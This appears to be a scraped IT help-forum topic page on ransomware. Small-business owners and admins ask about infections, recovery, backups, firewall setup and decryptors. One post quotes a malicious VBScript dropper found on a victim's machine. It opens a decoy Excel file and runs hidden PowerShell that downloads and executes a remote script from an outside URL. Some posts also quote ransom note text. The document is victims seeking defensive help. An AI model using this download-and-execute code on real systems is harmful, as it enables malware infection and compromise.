Ransomware

187

Solutions

460

Contributors

Ransomware is malicious software, designed to block data access in order to extort money. As a form of malware, ransomware is most often used to infiltrate devices through infected emails or links that, in turn, recognize and take advantage of vulnerabilities in the operating system and installed third-party software.


I am looking to purchase a firewall / anti-malware router. It's for my small business of currently about 30 people, but it will grow to up to 100 units within the next 1-2 years.

The problem is we had a ransomware attack a couple of days back, and it has made us more aware.

The other thing to take note of is: we don't have in-house IT professionals, so we hire professionals from all over the world to work on our servers; they sometimes use RDP or TeamViewer to log in.

We use VMware, specifically Proxmox, so we are considering using Nakivo for backup also.

Our ISP guy recommended we use a Mikrotik RB/1100AHX2 RouterBoard (RouterOS Level 6), but he thinks we are too small for it, and I think there's something better already.

I want to invest for the next 5 years. I want to buy something that will take us to the next level, yet keep us functional.

I don't know if we can also use it to block certain sites, manage bandwidth for users in the office, or anything that'll generally keep security really up above board. Thank you.
0

Need to find out the last user who modified files. The reason I need to know this is that we were hit by ransomware and need to know which computer or user it came from. It obviously got there via the network drives. When we right-click the ransom note file, it says the owner is Administrators, which is a group and not the user Administrator. The interesting thing is that all the other files that are now encrypted (Word, Excel, ...) have the original owner of the file as the owner (for example, jsmith). It would be very helpful to find the last user who modified the file; that's the user account that encrypted the file. I had auditing turned on, but it seems that since there was only a 16MB limit, the security logs were overwritten and we can't see which user account encrypted all the files. I wonder if some PowerShell command can help with that.
0
Local server security.

I just got hit by a ransomware attack. Hence I am asking for help to be able to achieve a great level of security, especially for my server, and for my devices.

Which devices should I get, and why?
0
Ransomware. Last week I gave my Indian developer RDP access to my local server on a ZTE F660 router. Normally I was using the HP MSR930 JG511A, but there were connectivity issues as we switched ISP, and they recommended we not use the HP anymore. I have strictly been relying on the ZTE.

Today I got the shock of my life; it was like a movie. Ransomware. Find attached.

1. Where is the issue most likely from? Is it from the router, or from other sources?
2. Do I actually have to pay them to get my system back up, since I don't really have a backup?
3. How do I prevent this?
4. How do I back up my local server? It's VMware.
0
I'm looking for someone to help set up a new WatchGuard T15 and a BOVPN to an existing XTM25. I know enough to be dangerous (maybe not even that much).

I'd envision having the person on the phone / remoted into my PC, which would be on the LAN side of the T15, and I'd have a TeamViewer connection to a PC on the LAN side of the XTM25 to set up the VPN (you are probably saying there are better ways to do the setup, but that's an indication of what I do and don't know).
0
I am looking for desktop imaging system recommendations. A little background: we are currently using Acronis but have outgrown it. I am looking into Quest KACE and SmartDeploy.

I am liking the features of SmartDeploy much more and would prefer to have a more modern imaging system like that as opposed to KACE. I know there are other options out there, like VMware Workspace ONE, Microsoft System Center Configuration Manager, and Clonezilla.

Does anyone have any experience with any of these, or would be able to recommend something better? We would prefer a cloud solution, if there is one.
0
Suddenly, thousands of files have been encrypted on our network drive. DO WE PAY THE RANSOM?

Thousands of files in our ShareFile directory were encrypted between 12:01 PM and 12:59 PM yesterday. Of course, in a matter of hours the encrypted files replaced the good files on every laptop and employee home machine that was running ShareFile.

The following string has been added to the name of every encrypted file:

.crypted_hoboblin@torquechat_com

Removing this string from the end of the filename does not help. Regardless of the type of file (.doc, .xls, .pdf, etc.), the file will not open. Depending on the program used to open it, it says the file is damaged.

One file in the root of the ShareFile directory, named how_to_back_files.html, does open and reads like this when opened (the wording is exact):

YOUR FILES ARE DECRYPTED!
Your documents, photos, databases and all the rest files encrypted cryptographically strong algoritm.
Without a secret key stored with us, the restoration of your files is impossible

----------------------------------------------------------
To start the recovery process:
Send an email to: hoboblin@torquechat.com with your personal ID in the message body.
In response, we will send you further instructions on decrypting your files.
---------------------------------------------------------
Your personal ID:
93 C7 AC 4B ... (This goes on for several lines!)

Do we contact them? Obviously, they are going to want money. Do we pay? Go to …
0
Hi,
Has anyone come across this ransomware: "CCF25092017.pdf.id-006C0843.[sqlbackup40@cock.li].adobe"? This was a small system I put together for a friend of mine: 3 PCs and a small server running Zentyal 4. All data on the PCs and server was encrypted. The PCs were Windows 10 running ESET AV, behind a 1-year-old SonicWall SOHO firewall.
Email runs through the Zentyal, but it's first filtered through Elive (like MessageLabs).
The PCs were so bad they would not boot; there was no usual ransom message, only infected TXT files. This happened last Saturday around 3pm, when nobody was on the system. There is one person who works remotely, but she says she was not on the system at that time.
No biggie here, as I had it all backed up with the Proxmox hypervisor; I had it all restored in an hour, then just rebuilt the PCs.
I'm just trying to figure out what happened here.
1
Got infected by ransomware. The network drives are encrypted. The issue is I can't find the user this started from. When I right-click the file, I get the owner as Administrators. What can I do to find the source computer? My file server is Server 2016.
0
I have shadow copies enabled on the C:\ of a Windows 2012 server. I currently have it set to the configuration below:

Maximum Size: 35MB
Schedule: Twice a day at 06:00 and 13:00

The server also has Acronis Backup installed and running multiple backup jobs to a local NAS and also to Acronis Cloud.

I've noticed that the shadow copy maximum size setting constantly resets to "no limit", but I can't understand why.

Can someone please offer any advice on why this occurs and how best to stop it being reset?
0

Has anyone had any luck with removing or recovering from Nozelesn ransomware?
0
Good day,

Having issues with Acronis Backup 12.5. I have used it on numerous servers, but one server is giving errors when remotely trying to install the agent.

Acronis server details:
Windows 2012 R2, up to date with patching

Target server:
Windows 2012 R2, up to date with patching

I have even disabled AV and the firewall on the target server. The installation from the Acronis server will run up to 38% and then fails with the error below:

Windows error: (0x80070643) Fatal error during installation
Date and time: Oct 02, 2018, 11:09:50 AM
Code: 4
Module: 309
Message: TOL: Failed to execute the command. Remote installation


Additional info:

------------------------
Error code: 22
Module: 309
LineInfo: 0x8D165E86FB81959B
Fields: {"$module":"management_server_vsa64_10330","CommandID":"8F2647A6-33E4-400D-BE39-561E2C91CC2F"}
Message: TOL: Failed to execute the command. Remote installation
------------------------
Error code: 22
Module: 309
LineInfo: 0x8D165E86FB81959B
Fields: {"$module":"remote_installation_addon_vsa64_10330","CommandID":"8F2647A6-33E4-400D-BE39-561E2C91CC2F"}
Message: TOL: Failed to execute the command. Remote installation
------------------------
Error code: 140
Module: 69
LineInfo: 0x448BB490B35D3532
Fields: {"$module":"remote_installation_addon_vsa64_10330"}
Message: Request to the remote installation service has failed. This may indicate a connection failure.

Error code: 101
Module: …
0
Hi, I have a problem with downloading Decrypting Cryakl from https://www.experts-exchange.com/articles/31579/Decrypting-Cryakl-1-4-0-0-1-4-1-0-FAIRYTAIL-Ransomware.html (and decryptors.blogspot.com). Can you help me with downloading the application?
I want to test on CL 1.5.1.0. I have one PC with this encryptor. I know that it was installed through RDP, and I have some files and logs. Maybe your decryptor can help.
It will then be possible to transfer the information to others.

Thank you.
0
There's a request for a "change runbook" that documents/records changes from Day 1,
so that in the event of bad changes (malicious or inadvertent ones) being introduced
along the line of changes, we can rebuild a server/system back selectively,
dropping the "bad" change so that we can bring the system up to a "clean" slate.

I was told it's not "Change Control" nor CRs that we are looking at here.

I've suggested that a 'bare metal' backup be done with incremental backups (I think
EMC has one such product), but this is not what the team requires.

Any documents, tools or methods are much appreciated.
0
Dear Team,
My Domain Controller's SYSVOL folder is affected by ransomware. The DC is working fine now.
How do I recreate the SYSVOL files? I have only one DC and no backup.

The server OS is Windows 2012.
I cannot reinstall the DC, since I have my Exchange running on it.
0
Hasn't happened, but just wondering.

If my Google Drive got hit and all files were encrypted, can I revert back to last week's clean files?

So I'm asking: does Google Drive afford any sort of fallback plan for this scenario?

Thanks
2
I have a user who is using the WatchGuard VPN client software. They have been using it on Windows 10 Pro (v1709) for 6 months without issue. The UAC prompt suddenly started appearing this morning when they try to run the software. No updates for Windows or the software have been installed. I have 60 other users who are using it without this problem. I am at a loss as to why this would suddenly start needing elevated privileges to run. Does anyone know why this would happen or how to fix it? I am not going to disable User Account Control or give them admin rights.
0
Hello all,

I am the owner of a small business in my town. I got infected by a ransomware with the .rapid extension; they want a big ransom that I can't pay.
Is there any solution for this version? Please help.
0
I have Acronis for backups to tape. I want to be able to back up the "System State" of my DC. What files or folders do I need to make sure get backed up?
0

I had this question after viewing "WatchGuard Firewall xFlow Configuration".
0
A customer has a WatchGuard T10 Firebox firewall for a POS system. The POS server connects directly to the trusted network port; no other computers connect to that network.

The customer wants to set up an access point for Wi-Fi. The WatchGuard has a 3rd port. I want to activate it as a second network and allow wireless devices to access the internet.

The WatchGuard firewall does not have built-in Wi-Fi. We purchased an access point that we plan to connect to the 3rd port.

This is a restaurant; there are no office PCs or network printers.

I need suggestions on policies. The device has content filter subscriptions, and I want to enforce them on the 3rd port too, if possible.
0
We believe a client has been hacked but can't determine what the VB script is doing to the data; it doesn't look like ransomware.
Can you help point us in a direction as to what degree this hack could be?

Below is the VBScript and a picture of a folder it has been found in. You will see that the actual Excel doc has been hidden and a fake Excel doc put in its place. It looks like when the fake Excel doc is run, it opens up the VBScript and the hidden Excel doc.

VBScript:
Set fso = CreateObject("Scripting.FileSystemObject")
Set shl = CreateObject("WScript.Shell")
Set shp = CreateObject("WScript.Shell")
path=shl.ExpandEnvironmentStrings("%APPDATA%")+"\"+GetUUID(".")
exists = fso.FolderExists(path)
Set objFile = fso.GetFile(Wscript.ScriptFullName)
rr = fso.GetParentFolderName(objFile)+"\Project 8192 LNG STS System Certification Log.xlsx"
if (exists) then
shl.Run("explorer.exe "+rr+"")
Else
shl.Run("explorer.exe "+rr+"")
shp.Run "powershell.exe  -windowstyle hidden -executionpolicy bypass -command iex((nEw-ObJect ('NEt.WeBclient')).('DowNLoAdStrInG').invoKe(('https://cflfuppn.eu/sload/2.0/netF.ps1')))",0,True
Set shp = Nothing
end if
Function GetUUID(strComputer)
Dim objWmi, colItems, objItem, strUUID, blnValidUUID
Set objWmi = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWmi.ExecQuery("Select * from Win32_ComputerSystemProduct")
strUUID = ""
blnValidUUID = False
For Each objItem in colItems
strUUID = objItem.UUID
If Not …
0
How do I block RFC 1918 addresses, create object groups, and use those object groups to block any UDP traffic inbound to the external interface on a WatchGuard Firebox (M200)?
0
We have a WatchGuard M200 firewall on which we would like to limit inbound/outbound bandwidth to 20Mbps on our External (WAN) interface. Our ISP allows for 40Mbps total bandwidth. I've gone into Traffic Management and changed the interface to limit bandwidth to 20Mbps, but this only seems to apply to upstream (outbound) traffic. Inbound traffic is still coming in at the full 40Mbps. Is it possible to also limit inbound traffic to 20Mbps?

Thank you
0
Hi!
I'm trying to use the program by James-Gourley to decrypt a 1.4.0.0 version of Cryakl. Some files are decrypted correctly, and other files are not decrypted, with an "encryption signature mismatch" message. Help me please. Sample files: https://dropmefiles.com/769Q7 More examples of unencrypted files: https://dropmefiles.com/CZ7xH
0